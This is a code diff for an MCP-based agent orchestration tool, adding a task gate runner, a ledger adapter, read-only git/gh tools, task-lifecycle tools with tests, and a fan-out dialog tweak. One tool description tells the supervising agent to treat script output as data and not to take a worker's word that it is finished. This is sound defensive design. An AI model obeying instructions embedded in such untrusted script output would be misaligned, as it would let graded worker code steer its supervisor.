+      await vi.advanceTimersByTimeAsync(0);
+      await vi.advanceTimersByTimeAsync(1001);
+      const res = await pending;
+      if (res.status !== 'completed') throw new Error('unreachable');
+      expect(res.result.exitCode).toBeNull();
+      expect(res.result.tail).toContain('timed out');
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+
+  it('records the verdict as a system actor with the revision it read', async () => {
+    const ledger = fakeLedger();
+    const runner = new TaskGateRunner({
+      ledger,
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    if (res.status !== 'completed') throw new Error('unreachable');
+    expect(res.recorded).toBe(true);
+    expect(ledger.writes[0]).toMatchObject({
+      taskId: 'wtask-1',
+      expectedRev: 3,
+      actor: { kind: 'system', workspaceId: 'ws-daemon' },
+    });
+  });
+
+  it('reports an unreachable ledger without failing the gate', async () => {
+    const runner = new TaskGateRunner({
+      ledger: { read: async () => null, writeGate: async () => ({ ok: false, reason: 'unavailable', error: 'x' }) },
+      spawn: fakeSpawn({ code: 0 }),
+      readPackageScripts: () => npmProject,
+      depsState: () => 'ok',
+    });
+    const res = await runner.run({ taskId: 'wtask-1', worktreePath: WT, systemWorkspaceId: 'ws-daemon' });
+    if (res.status !== 'completed') throw new Error('unreachable');
+    expect(res.result.exitCode).toBe(0);
+    expect(res.recorded).toBe(false);
+  });
+});
+
+describe('boundTail', () => {
+  it('keeps only the last GATE_TAIL_LINES lines', () => {
+    const raw = Array.from({ length: GATE_TAIL_LINES + 20 }, (_, i) => `line ${i}`).join('\n');
+    const tail = boundTail(raw);
+    expect(tail.split('\n')).toHaveLength(GATE_TAIL_LINES);
+    expect(tail.endsWith(`line ${GATE_TAIL_LINES + 19}`)).toBe(true);
+  });
+
+  it('drops from the front so the end survives the byte cap', () => {
+    const raw = 'x'.repeat(LEDGER_GATE_TAIL_MAX_BYTES * 2) + 'THE-END';
+    const tail = boundTail(raw);
+    expect(Buffer.byteLength(tail, 'utf8')).toBeLessThanOrEqual(LEDGER_GATE_TAIL_MAX_BYTES);
+    expect(tail.endsWith('THE-END')).toBe(true);
+  });
+});

--- a/src/main/worktask/ledgerPort.ts
+++ b/src/main/worktask/ledgerPort.ts
@@ -1,0 +1,93 @@
+// ─── LedgerPort — the one seam between the gate runner and the task ledger ───
+//
+// The gate runner records its verdict in the task ledger (src/shared/ledger.ts),
+// and the ledger's writer is the DAEMON: `ledger.update` over the pipe. That RPC
+// ships on a different lane, in parallel with this file, so the runner never
+// calls it directly — it calls this interface, and exactly one adapter
+// (`createDaemonLedgerPort`) knows the method name and the parameter shape.
+// Pointing the adapter at the real RPC is a one-file change; every test in this
+// directory injects a fake instead of a daemon.
+//
+// Compare-and-swap, not last-write-wins: `LedgerEntry.rev` is monotonic and the
+// writer refuses a stale `expectedRev`, so a caller must READ before it writes.
+// That is why `read` exists here at all — a port with only `update` would force
+// every caller to invent a revision.
+
+import type { LedgerActor, LedgerGateResult } from '../../shared/ledger';
+
+/** The snapshot a writer needs before it may write: the revision it read. */
+export interface LedgerSnapshot {
+  id: string;
+  rev: number;
+}
+
+export interface LedgerGateWrite {
+  taskId: string;
+  /** The `rev` of the entry this write was computed from (compare-and-swap). */
+  expectedRev: number;
+  /** Always `{ kind: 'system' }` for the gate runner — the daemon ran it, not
+   *  the worker whose code it graded. */
+  actor: LedgerActor;
+  gate: LedgerGateResult;
+}
+
+export type LedgerWriteResult =
+  | { ok: true; rev: number }
+  /** `conflict` = someone else wrote first; the caller must re-read and retry.
+   *  `unavailable` = the daemon is not reachable, which must NOT fail the gate:
+   *  the gate ran, only its receipt is missing. */
+  | { ok: false; reason: 'conflict' | 'not_found' | 'unavailable' | 'refused'; error: string };
+
+export interface LedgerPort {
+  read(taskId: string): Promise<LedgerSnapshot | null>;
+  writeGate(write: LedgerGateWrite): Promise<LedgerWriteResult>;
+}
+
+/** Daemon RPC minimum surface (same shape as CloseDaemonPort — injectable). */
+export interface LedgerDaemonPort {
+  rpc(method: string, params: Record<string, unknown>): Promise<unknown>;
+}
+
+/**
+ * The one adapter that names the wire method. Lane F owns `ledger.get` /
+ * `ledger.update`; until they are registered this returns `unavailable`, which
+ * the gate runner already treats as "ran, unrecorded" rather than a failure.
+ */
+export function createDaemonLedgerPort(daemon: LedgerDaemonPort): LedgerPort {
+  return {
+    async read(taskId: string): Promise<LedgerSnapshot | null> {
+      try {
+        const res = (await daemon.rpc('ledger.get', { taskId })) as
+          | { ok?: boolean; entry?: { id?: unknown; rev?: unknown } }
+          | undefined;
+        const entry = res?.ok === true ? res.entry : undefined;
+        if (!entry || typeof entry.id !== 'string' || typeof entry.rev !== 'number') return null;
+        return { id: entry.id, rev: entry.rev };
+      } catch {
+        return null;
+      }
+    },
+    async writeGate(write: LedgerGateWrite): Promise<LedgerWriteResult> {
+      try {
+        const res = (await daemon.rpc('ledger.update', {
+          taskId: write.taskId,
+          expectedRev: write.expectedRev,
+          actor: write.actor,
+          gate: write.gate,
+        })) as { ok?: boolean; rev?: unknown; error?: { code?: unknown; message?: unknown } } | undefined;
+        if (res?.ok === true && typeof res.rev === 'number') return { ok: true, rev: res.rev };
+        const code = typeof res?.error?.code === 'string' ? res.error.code : '';
+        const message = typeof res?.error?.message === 'string' ? res.error.message : 'ledger.update failed';
+        const reason =
+          code === 'ABORTED' || code === 'CONFLICT'
+            ? ('conflict' as const)
+            : code === 'NOT_FOUND'
+              ? ('not_found' as const)
+              : ('refused' as const);
+        return { ok: false, reason, error: message };
+      } catch (err) {
+        return { ok: false, reason: 'unavailable', error: err instanceof Error ? err.message : String(err) };
+      }
+    },
+  };
+}

--- a/src/mcp/__tests__/git.test.ts
+++ b/src/mcp/__tests__/git.test.ts
@@ -1,0 +1,104 @@
+// Tests for the read-only git/gh tools.
+//
+// The point of these tools is that nothing a caller types becomes part of a
+// command line: it names a TASK, and main runs a fixed argv in the worktree it
+// has already checked the caller owns. So what is asserted here is the absence
+// of any path/ref/command input, the clamp on `limit`, and that a "no PR" answer
+// survives as data.
+
+import { describe, expect, it, vi, beforeEach } from 'vitest';
+
+vi.mock('../wmux-client', () => ({
+  sendRpc: vi.fn(),
+  setClientIdentity: vi.fn(),
+  clearClientIdentity: vi.fn(),
+}));
+
+import { z } from 'zod';
+import { sendRpc } from '../wmux-client';
+import { registerGitTools } from '../git';
+
+const mockSendRpc = sendRpc as unknown as ReturnType<typeof vi.fn>;
+
+type ToolHandler = (args: Record<string, unknown>) => Promise<{
+  content: { type: 'text'; text: string }[];
+  isError?: boolean;
+}>;
+
+const shapes = new Map<string, Record<string, unknown>>();
+const tools = new Map<string, ToolHandler>();
+
+const server = {
+  tool: (name: string, _desc: string, schema: Record<string, unknown>, handler: ToolHandler) => {
+    tools.set(name, handler);
+    shapes.set(name, schema);
+  },
+};
+registerGitTools(server as never, { getSenderPtyId: () => 'pty-mine', resolveWorkspaceId: async () => 'ws-mine' });
+
+const NAMES = ['git_status', 'git_log', 'gh_pr_view'] as const;
+
+beforeEach(() => {
+  mockSendRpc.mockReset();
+  mockSendRpc.mockResolvedValue({ ok: true });
+});
+
+describe('tool surface', () => {
+  it('registers the three contracted names and nothing else', () => {
+    expect([...tools.keys()].sort()).toEqual([...NAMES].sort());
+  });
+
+  it.each(NAMES)('%s exposes no path, ref, revision or command input', (name) => {
+    for (const key of Object.keys(shapes.get(name) ?? {})) {
+      expect(key).not.toMatch(/path|repo|worktree|ref|rev|branch|cmd|command|args/i);
+    }
+  });
+
+  it('caps git_log limit in the schema as well as on the server', () => {
+    const limit = (shapes.get('git_log') ?? {})['limit'] as z.ZodTypeAny;
+    expect(limit.safeParse(50).success).toBe(true);
+    expect(limit.safeParse(51).success).toBe(false);
+    expect(limit.safeParse(0).success).toBe(false);
+    expect(limit.safeParse(1.5).success).toBe(false);
+    // Optional: omitting it means the server default.
+    expect(limit.safeParse(undefined).success).toBe(true);
+  });
+});
+
+describe('the wire call', () => {
+  it.each([
+    ['git_status', 'task.git.status'],
+    ['git_log', 'task.git.log'],
+    ['gh_pr_view', 'task.gh.prView'],
+  ])('%s sends %s with the verified ptyId', async (tool, method) => {
+    await tools.get(tool)?.({ task_id: 'wtask-1' });
+    expect(mockSendRpc).toHaveBeenCalledWith(method, { taskId: 'wtask-1', senderPtyId: 'pty-mine' });
+  });
+
+  it('omits limit entirely when the caller does not give one', async () => {
+    await tools.get('git_log')?.({ task_id: 'wtask-1' });
+    expect(mockSendRpc).toHaveBeenCalledWith('task.git.log', { taskId: 'wtask-1', senderPtyId: 'pty-mine' });
+    await tools.get('git_log')?.({ task_id: 'wtask-1', limit: 5 });
+    expect(mockSendRpc).toHaveBeenLastCalledWith('task.git.log', {
+      taskId: 'wtask-1',
+      limit: 5,
+      senderPtyId: 'pty-mine',
+    });
+  });
+});
+
+describe('the answer', () => {
+  it('hands back "no PR" as data the caller can read', async () => {
+    mockSendRpc.mockResolvedValue({ ok: false, taskId: 'wtask-1', reason: 'no-pr', error: 'no pull requests found' });
+    const res = await tools.get('gh_pr_view')?.({ task_id: 'wtask-1' });
+    const parsed = JSON.parse(res?.content[0]?.text ?? '{}') as Record<string, unknown>;
+    expect(parsed['reason']).toBe('no-pr');
+  });
+
+  it('returns the parsed status object unchanged', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, clean: false, files: [{ status: ' M', path: 'a.ts' }] });
+    const res = await tools.get('git_status')?.({ task_id: 'wtask-1' });
+    const parsed = JSON.parse(res?.content[0]?.text ?? '{}') as Record<string, unknown>;
+    expect(parsed['files']).toEqual([{ status: ' M', path: 'a.ts' }]);
+  });
+});

--- a/src/mcp/__tests__/worktask.test.ts
+++ b/src/mcp/__tests__/worktask.test.ts
@@ -1,0 +1,121 @@
+// Tests for the task-lifecycle MCP tools.
+//
+// The trust boundary is main-side (worktask.rpc.test.ts). What is pinned HERE
+// is the tool SHAPE: a schema that cannot express a call main rejects, the
+// verified ptyId attached on every call, and the wire envelope handed back
+// whole — collapsing it would hide the `reason` an unattended caller branches
+// on ('dirty', 'unpushed', 'busy', 'deps_missing').
+
+import { describe, expect, it, vi, beforeEach } from 'vitest';
+
+vi.mock('../wmux-client', () => ({
+  sendRpc: vi.fn(),
+  setClientIdentity: vi.fn(),
+  clearClientIdentity: vi.fn(),
+}));
+
+import { sendRpc } from '../wmux-client';
+import { registerWorktaskTools } from '../worktask';
+
+const mockSendRpc = sendRpc as unknown as ReturnType<typeof vi.fn>;
+
+type ToolHandler = (args: Record<string, unknown>) => Promise<{
+  content: { type: 'text'; text: string }[];
+  isError?: boolean;
+}>;
+
+const shapes = new Map<string, Record<string, unknown>>();
+const tools = new Map<string, ToolHandler>();
+let resolveCalls = 0;
+
+const server = {
+  tool: (name: string, _desc: string, schema: Record<string, unknown>, handler: ToolHandler) => {
+    tools.set(name, handler);
+    shapes.set(name, schema);
+  },
+};
+registerWorktaskTools(server as never, {
+  getSenderPtyId: () => 'pty-mine',
+  resolveWorkspaceId: async () => {
+    resolveCalls += 1;
+    return 'ws-mine';
+  },
+});
+
+const NAMES = ['task_gate_run', 'task_adopt', 'task_close', 'task_pr'] as const;
+
+beforeEach(() => {
+  mockSendRpc.mockReset();
+  mockSendRpc.mockResolvedValue({ ok: true });
+  resolveCalls = 0;
+});
+
+describe('tool surface', () => {
+  it('registers the four contracted names and nothing else', () => {
+    expect([...tools.keys()].sort()).toEqual([...NAMES].sort());
+  });
+
+  it.each(NAMES)('%s exposes no workspace, path, repo or command input', (name) => {
+    for (const key of Object.keys(shapes.get(name) ?? {})) {
+      expect(key).not.toMatch(/workspace|worktree|path|repo|cmd|command/i);
+    }
+  });
+
+  it.each(NAMES)('%s takes a task id', (name) => {
+    expect(Object.keys(shapes.get(name) ?? {})).toContain('task_id');
+  });
+});
+
+describe('the wire call', () => {
+  it.each([
+    ['task_gate_run', 'task.gate.run'],
+    ['task_adopt', 'task.adopt'],
+    ['task_close', 'task.close'],
+    ['task_pr', 'task.pr'],
+  ])('%s sends %s with the verified ptyId and camelCase taskId', async (tool, method) => {
+    await tools.get(tool)?.({ task_id: 'wtask-1' });
+    expect(mockSendRpc).toHaveBeenCalledWith(method, { taskId: 'wtask-1', senderPtyId: 'pty-mine' });
+  });
+
+  it('resolves identity BEFORE reading the ptyId (a cold getter answers empty)', async () => {
+    await tools.get('task_close')?.({ task_id: 'wtask-1' });
+    expect(resolveCalls).toBe(1);
+  });
+
+  it('passes an optional PR body and omits it otherwise', async () => {
+    await tools.get('task_pr')?.({ task_id: 'wtask-1', body: 'why' });
+    expect(mockSendRpc).toHaveBeenLastCalledWith('task.pr', {
+      taskId: 'wtask-1',
+      body: 'why',
+      senderPtyId: 'pty-mine',
+    });
+    await tools.get('task_pr')?.({ task_id: 'wtask-1' });
+    expect(mockSendRpc).toHaveBeenLastCalledWith('task.pr', { taskId: 'wtask-1', senderPtyId: 'pty-mine' });
+  });
+});
+
+describe('the answer', () => {
+  it('keeps the refusal envelope whole and flags it as an error', async () => {
+    mockSendRpc.mockResolvedValue({ ok: false, taskId: 'wtask-1', reason: 'unpushed', aheadCount: 2 });
+    const res = await tools.get('task_close')?.({ task_id: 'wtask-1' });
+    expect(res?.isError).toBe(true);
+    const parsed = JSON.parse(res?.content[0]?.text ?? '{}') as Record<string, unknown>;
+    expect(parsed['reason']).toBe('unpushed');
+    expect(parsed['aheadCount']).toBe(2);
+  });
+
+  it('does not flag a successful gate run, whatever the exit code says', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, status: 'completed', result: { exitCode: 1 } });
+    const res = await tools.get('task_gate_run')?.({ task_id: 'wtask-1' });
+    // The CALL succeeded; the gate failed. Those are different, and an isError
+    // here would make a failing gate look like a broken tool.
+    expect(res?.isError).toBeUndefined();
+  });
+
+  it('reports a transport failure as an error instead of throwing', async () => {
+    mockSendRpc.mockRejectedValue(new Error('wmux is not running'));
+    const res = await tools.get('task_adopt')?.({ task_id: 'wtask-1' });
+    expect(res?.isError).toBe(true);
+    expect(res?.content[0]?.text).toContain('wmux is not running');
+  });
+});

--- a/src/mcp/git.ts
+++ b/src/mcp/git.ts
@@ -1,0 +1,104 @@
+// ─── Read-only git/gh tools for a task worktree ─────────────────────────────
+//
+// A supervising agent had exactly one way to find out what a task had actually
+// produced: read its pane's screen. Screens lie — they scroll, they are
+// redrawn by full-screen TUIs, and they carry no structure. These three tools
+// answer the same questions as data.
+//
+// Read-only by construction. There is no argument that becomes part of a git
+// command line: the caller names a TASK, main resolves that to a worktree it
+// has already checked the caller owns, and runs a fixed argv there. `git_log`'s
+// limit is a number, clamped server-side.
+//
+// Failures come back as DATA, not as thrown errors: "there is no PR for this
+// branch" and "gh is not installed" are answers a caller acts on.
+
+import type { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
+import { z } from 'zod';
+import { sendRpc } from './wmux-client';
+import type { RpcMethod } from '../shared/rpc';
+
+/** Mirrors TASK_GIT_LOG_DEFAULT / TASK_GIT_LOG_MAX in
+ *  src/main/pipe/handlers/worktask.rpc.ts. Restated rather than imported: this
+ *  file is bundled into the MCP server, and importing from src/main would drag
+ *  the whole main process into that bundle. The server clamps regardless, so a
+ *  drift here costs a slightly wrong description, never a wrong result. */
+const TASK_GIT_LOG_DEFAULT = 20;
+const TASK_GIT_LOG_MAX = 50;
+
+/** Identical injection contract to WorktaskToolDeps / FanOutToolDeps. */
+export interface GitToolDeps {
+  getSenderPtyId?: () => string;
+  resolveWorkspaceId?: () => Promise<string>;
+}
+
+const TASK_ID = z
+  .string()
+  .min(1)
+  .describe('The task id (wtask-…) whose worktree to read. Must be a task your workspace owns.');
+
+async function callGit(
+  method: string,
+  params: Record<string, unknown>,
+  deps: GitToolDeps,
+): Promise<{ content: { type: 'text'; text: string }[]; isError?: true }> {
+  if (deps.resolveWorkspaceId) {
+    try {
+      await deps.resolveWorkspaceId();
+    } catch {
+      // main's refusal to make, with its own message.
+    }
+  }
+  const pty = deps.getSenderPtyId?.() ?? '';
+  const wire: Record<string, unknown> = { ...params };
+  if (pty) wire['senderPtyId'] = pty;
+  try {
+    const result = (await sendRpc(method as unknown as RpcMethod, wire)) as { ok?: boolean } | undefined;
+    return {
+      content: [{ type: 'text' as const, text: JSON.stringify(result ?? {}, null, 2) }],
+      ...(result && result.ok === false ? { isError: true as const } : {}),
+    };
+  } catch (err) {
+    return {
+      content: [{ type: 'text' as const, text: `Error: ${err instanceof Error ? err.message : String(err)}` }],
+      isError: true,
+    };
+  }
+}
+
+/** Register the read-only git tools on the given MCP server. */
+export function registerGitTools(server: McpServer, deps: GitToolDeps): void {
+  server.tool(
+    'git_status',
+    'Working-tree state of a task\'s worktree, as data: { branch, ahead, behind, clean, files: [{ status, path }] }. ' +
+      'Use it before task_close (which refuses on a dirty or unpushed branch) and instead of reading a terminal screen to guess whether a worker has finished.',
+    { task_id: TASK_ID },
+    async ({ task_id }) => callGit('task.git.status', { taskId: task_id }, deps),
+  );
+
+  server.tool(
+    'git_log',
+    `Recent commits in a task's worktree: [{ hash, author, date, subject }], newest first. ` +
+      `limit defaults to ${TASK_GIT_LOG_DEFAULT} and is clamped to ${TASK_GIT_LOG_MAX}; the limit that actually ran comes back in the result.`,
+    {
+      task_id: TASK_ID,
+      limit: z
+        .number()
+        .int()
+        .min(1)
+        .max(TASK_GIT_LOG_MAX)
+        .optional()
+        .describe(`How many commits (default ${TASK_GIT_LOG_DEFAULT}, max ${TASK_GIT_LOG_MAX}).`),
+    },
+    async ({ task_id, limit }) =>
+      callGit('task.git.log', { taskId: task_id, ...(limit !== undefined ? { limit } : {}) }, deps),
+  );
+
+  server.tool(
+    'gh_pr_view',
+    'The pull request for a task\'s branch, via the GitHub CLI: { number, title, state, url, isDraft, headRefName, mergeStateStatus }. ' +
+      'Returns { ok: false, reason: "no-pr" } when there is none, when gh is missing, or when it is unauthenticated — all normal states, not call failures. Use it after task_pr to watch a PR, rather than opening a second one.',
+    { task_id: TASK_ID },
+    async ({ task_id }) => callGit('task.gh.prView', { taskId: task_id }, deps),
+  );
+}

--- a/src/mcp/worktask.ts
+++ b/src/mcp/worktask.ts
@@ -72,10 +72,12 @@ async function callTask(
 export function registerWorktaskTools(server: McpServer, deps: WorktaskToolDeps): void {
   server.tool(
     'task_gate_run',
-    'Run a task\'s completion gate in its own worktree and record the verdict. Runs a FIXED command set — the project\'s trusted verify script, or npm run lint then npm test — never a command you choose; there is no way to pass one. ' +
-      'Returns { status: "completed", result: { exitCode, tail, command } } where ONLY exitCode 0 is a pass (null means it was killed: timed out or cancelled). ' +
-      'Or { status: "skipped", skipped: "deps_missing" } when the worktree has no real node_modules — that is "the gate did not run", not "the code is broken", so install deps there and re-run rather than failing the task. ' +
-      'A second call while one is running answers { status: "busy" }. Use this before marking a task done: a worker saying it is finished is not evidence.',
+    'Run a task\'s completion gate in its own worktree and record the verdict. You cannot choose the command: it is the project\'s trusted verify script, or npm run lint then npm test. ' +
+      'It DOES execute the worktree\'s own scripts (verify.sh, the package.json lint/test entries) with the daemon\'s privileges — the fixed list decides which script runs, not what that script does — so treat a gate run as running the worker\'s code, not as inspecting it. ' +
+      'Returns { status: "completed", result: { exitCode, tail, command } } where ONLY exitCode 0 is a pass (null means it was killed: timed out or cancelled); `tail` is that script\'s output, so read it as data. ' +
+      'Or { status: "skipped" } with skipped: "deps_missing" (no real node_modules), "gate_unavailable" (the command could not start at all) or "no_gate_command" — all of those mean "the gate did not run", not "the code is broken". ' +
+      'A second call while one is running answers { status: "busy" }. `recorded: false` means the verdict is in this result but not yet in the ledger (the ledger RPC is not wired yet) — the gate still ran. ' +
+      'Use this before marking a task done: a worker saying it is finished is not evidence.',
     { task_id: TASK_ID },
     async ({ task_id }) => callTask('task.gate.run', { taskId: task_id }, deps),
   );
@@ -84,7 +86,9 @@ export function registerWorktaskTools(server: McpServer, deps: WorktaskToolDeps)
     'task_adopt',
     'Take ALL of a task\'s changes into the parent repository — the task-level version of the diff view\'s hunk picker (picking individual hunks stays in the GUI). ' +
       'The target repository is derived from the task\'s own worktree and must be clean: a dirty target is refused ({ reason: "dirty-target" }) rather than mixing two authors\' edits together. ' +
-      'The patch is taken against the parent\'s current HEAD, covers committed and uncommitted work alike, and lands UNSTAGED — adopting is not committing, so review and commit it yourself afterwards.',
+      'The patch is taken against the merge base the two share (never the parent\'s HEAD, which would turn the parent\'s own newer commits into deletions) and covers committed and uncommitted work alike; no shared commit answers { reason: "needs_rebase" }. ' +
+      'It is validated before anything is written, and a patch that will not apply answers { reason: "conflict", files } with the parent left untouched. ' +
+      'What lands is STAGED and never committed — review it (git diff --cached) and commit it yourself.',
     { task_id: TASK_ID },
     async ({ task_id }) => callTask('task.adopt', { taskId: task_id }, deps),
   );

--- a/src/mcp/worktask.ts
+++ b/src/mcp/worktask.ts
@@ -1,0 +1,114 @@
+// ─── Task-lifecycle tools for the bundled MCP server ────────────────────────
+//
+// `fanout_start` could open N tasks; nothing could finish one. Closing a task,
+// opening its PR, taking its result and running its gate were all renderer-only
+// (Electron IPC), so a supervising agent's only move after fanning out was to
+// ask a human to click four times per task. These four tools are the other half
+// of the loop.
+//
+// Every tool here is a thin pass-through: the trust boundary is main-side
+// (src/main/pipe/handlers/worktask.rpc.ts). What this file owes the caller is a
+// SCHEMA that cannot express a call main will reject — so there is no workspace
+// input, no worktree path, no repository, no command. A task id and the
+// caller's verified identity are the whole surface, and the identity is not a
+// field: it is the server's own walked ptyId, attached below.
+
+import type { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
+import { z } from 'zod';
+import { sendRpc } from './wmux-client';
+import type { RpcMethod } from '../shared/rpc';
+
+/** Resolvers the parent module injects (identical to FanOutToolDeps — see
+ *  src/mcp/fanout.ts for why the resolver, not just the getter, is required). */
+export interface WorktaskToolDeps {
+  /** The server's OWN verified senderPtyId ('' on miss). */
+  getSenderPtyId?: () => string;
+  /** Runs the identity walk that POPULATES that ptyId. Called first on every
+   *  tool, because reading the getter cold yields '' and main fails closed. */
+  resolveWorkspaceId?: () => Promise<string>;
+}
+
+const TASK_ID = z
+  .string()
+  .min(1)
+  .describe('The task id (wtask-…) from fanout_start or your mission list. Must be a task your workspace owns.');
+
+/**
+ * One call shape for all four tools: resolve identity, attach the verified
+ * ptyId, send, hand the envelope back whole. The envelope is never collapsed to
+ * a message — `reason` fields ('dirty', 'unpushed', 'busy', 'deps_missing') are
+ * how an unattended caller tells "refused, fix this" from "failed".
+ */
+async function callTask(
+  method: string,
+  params: Record<string, unknown>,
+  deps: WorktaskToolDeps,
+): Promise<{ content: { type: 'text'; text: string }[]; isError?: true }> {
+  if (deps.resolveWorkspaceId) {
+    try {
+      await deps.resolveWorkspaceId();
+    } catch {
+      // Unresolvable identity is main's refusal to make, with its own message.
+    }
+  }
+  const pty = deps.getSenderPtyId?.() ?? '';
+  const wire: Record<string, unknown> = { ...params };
+  if (pty) wire['senderPtyId'] = pty;
+  try {
+    const result = (await sendRpc(method as unknown as RpcMethod, wire)) as { ok?: boolean } | undefined;
+    return {
+      content: [{ type: 'text' as const, text: JSON.stringify(result ?? {}, null, 2) }],
+      ...(result && result.ok === false ? { isError: true as const } : {}),
+    };
+  } catch (err) {
+    return {
+      content: [{ type: 'text' as const, text: `Error: ${err instanceof Error ? err.message : String(err)}` }],
+      isError: true,
+    };
+  }
+}
+
+/** Register the task-lifecycle tools on the given MCP server. */
+export function registerWorktaskTools(server: McpServer, deps: WorktaskToolDeps): void {
+  server.tool(
+    'task_gate_run',
+    'Run a task\'s completion gate in its own worktree and record the verdict. Runs a FIXED command set — the project\'s trusted verify script, or npm run lint then npm test — never a command you choose; there is no way to pass one. ' +
+      'Returns { status: "completed", result: { exitCode, tail, command } } where ONLY exitCode 0 is a pass (null means it was killed: timed out or cancelled). ' +
+      'Or { status: "skipped", skipped: "deps_missing" } when the worktree has no real node_modules — that is "the gate did not run", not "the code is broken", so install deps there and re-run rather than failing the task. ' +
+      'A second call while one is running answers { status: "busy" }. Use this before marking a task done: a worker saying it is finished is not evidence.',
+    { task_id: TASK_ID },
+    async ({ task_id }) => callTask('task.gate.run', { taskId: task_id }, deps),
+  );
+
+  server.tool(
+    'task_adopt',
+    'Take ALL of a task\'s changes into the parent repository — the task-level version of the diff view\'s hunk picker (picking individual hunks stays in the GUI). ' +
+      'The target repository is derived from the task\'s own worktree and must be clean: a dirty target is refused ({ reason: "dirty-target" }) rather than mixing two authors\' edits together. ' +
+      'The patch is taken against the parent\'s current HEAD, covers committed and uncommitted work alike, and lands UNSTAGED — adopting is not committing, so review and commit it yourself afterwards.',
+    { task_id: TASK_ID },
+    async ({ task_id }) => callTask('task.adopt', { taskId: task_id }, deps),
+  );
+
+  server.tool(
+    'task_close',
+    'Close a task and remove its git worktree. Destructive and deliberately picky: it refuses ({ reason: "unpushed" }) while the branch has commits nobody has pushed, and refuses ({ reason: "dirty" }, preserving the worktree) while there are uncommitted changes — so a close never silently destroys work. ' +
+      'Harvest first (task_adopt, or task_pr), then close. Only tasks your own workspace owns can be closed.',
+    { task_id: TASK_ID },
+    async ({ task_id }) => callTask('task.close', { taskId: task_id }, deps),
+  );
+
+  server.tool(
+    'task_pr',
+    'Push a task\'s branch and open its pull request with the GitHub CLI, returning { prUrl }. Refuses with a named reason when gh is missing or unauthenticated, when the worktree has uncommitted changes (they would not be in the PR), or when there is no origin remote. ' +
+      'Re-running after a partial failure converges on the existing PR rather than opening a second one.',
+    {
+      task_id: TASK_ID,
+      body: z
+        .string()
+        .optional()
+        .describe('PR body. Omit for a one-line default naming the task.'),
+    },
+    async ({ task_id, body }) =>
+      callTask('task.pr', { taskId: task_id, ...(body !== undefined ? { body } : {}) }, deps),
+  );
+}

--- a/src/renderer/components/AgentToolbar/FanOutDialog.tsx
+++ b/src/renderer/components/AgentToolbar/FanOutDialog.tsx
@@ -89,6 +89,10 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
   const [roles, setRoles] = useState<string[]>([]);
   const roleBindings = useStore((s) => s.orchestratorRoleBindings);
   const [submitting, setSubmitting] = useState(false);
+  // Two-step launch for the all-empty case (see handleSubmit). Not a modal: the
+  // dialog is already a popover, and a second popover over it would be a worse
+  // place to read a warning than the button you are about to press again.
+  const [confirmEmpty, setConfirmEmpty] = useState(false);
 
   // repo 기본값이 늦게 로드되면 반영.
   useEffect(() => {
@@ -134,6 +138,12 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
   const promptOverCap = effectiveBytes.some((b) => b > FANOUT_PROMPT_MAX_BYTES);
   // 정보성 힌트일 뿐 제출을 막지 않는다(§7 — 환경만 조성도 정당한 사용).
   const promptAllEmpty = effectiveBytes.every((b) => b === 0);
+
+  // Typing a prompt withdraws the question — a stale "are you sure it's empty?"
+  // sitting over a filled form is worse than no warning at all.
+  useEffect(() => {
+    if (!promptAllEmpty) setConfirmEmpty(false);
+  }, [promptAllEmpty]);
 
   // The checkbox is a projection of the agentCmd string, not a second state:
   // typing the flag by hand ticks it, unchecking strips it. That is what keeps
@@ -187,6 +197,14 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
       pushToast({ level: 'warn', message: t('fanout.errRepoRequired') });
       return;
     }
+    // §7 still holds — N environments with no prompt is a legitimate use — but
+    // it is almost never what someone means when they have just filled in
+    // titles and roles and forgotten the prompt. So it is confirmed, not
+    // refused: press Launch again and it goes.
+    if (promptAllEmpty && !confirmEmpty) {
+      setConfirmEmpty(true);
+      return;
+    }
     setSubmitting(true);
     // 호출 단위 멱등키 1회 발급(§2 G1) — 더블클릭·재시도가 N배 worktree를 못 찍는다.
     const idempotencyKey = generateId('fanout');
@@ -220,7 +238,7 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
     } finally {
       setSubmitting(false);
     }
-  }, [submitting, prompt, promptOverCap, repoPath, titles, effectiveTaskPrompts, roles, n, effectiveAgentCmd, workspace, pushToast, t]);
+  }, [submitting, prompt, promptOverCap, promptAllEmpty, confirmEmpty, repoPath, titles, effectiveTaskPrompts, roles, n, effectiveAgentCmd, workspace, pushToast, t]);
 
   const label = 'text-[11px] text-[var(--text-sub)] mb-1 block';
 
@@ -319,12 +337,14 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
                   how one fan-out puts its review task on a different CLI than
                   its build tasks. Unbound roles stay selectable — the task then
                   launches on the command above, unchanged. */}
-              {/* Capped: a bound role reads "Reviewer — claude", which would
-                  otherwise size the select wide enough to squeeze the title. */}
+              {/* Bounded at both ends. The old floor (92px) was narrow enough
+                  that a bound role — "Reviewer — claude" — was cut mid-word in
+                  the closed select, which is the one state you read it in; the
+                  ceiling stays so it cannot squeeze the title field. */}
               <select
                 aria-label={t('fanout.roleLabel', { k: k + 1 })}
                 className="ui-input shrink-0 text-[11px] py-0.5"
-                style={{ minWidth: 92, maxWidth: 148 }}
+                style={{ minWidth: 132, maxWidth: 168 }}
                 value={roles[k] ?? ''}
                 onChange={(e) => setRoleAt(k, e.target.value)}
                 data-testid={`fanout-role-${k}`}
@@ -426,6 +446,16 @@ export default function FanOutDialog({ onClose, workspaceId, align = 'left' }: F
           <span className="text-[var(--text-muted)]"> {t('fanout.commandPreviewPromptArg')}</span>
         )}
       </code>
+
+      {confirmEmpty && (
+        <div
+          className="mb-2 rounded-[4px] border border-[var(--accent-amber,var(--accent))] px-2 py-1 text-[10px] text-[var(--text-sub)]"
+          role="alert"
+          data-testid="fanout-confirm-empty"
+        >
+          {t('fanout.confirmEmpty', { n })}
+        </div>
+      )}
 
       {/* Pinned footer. The dialog is a 70vh scroll container, so with the
           actions in normal flow the primary action sat below the fold — you
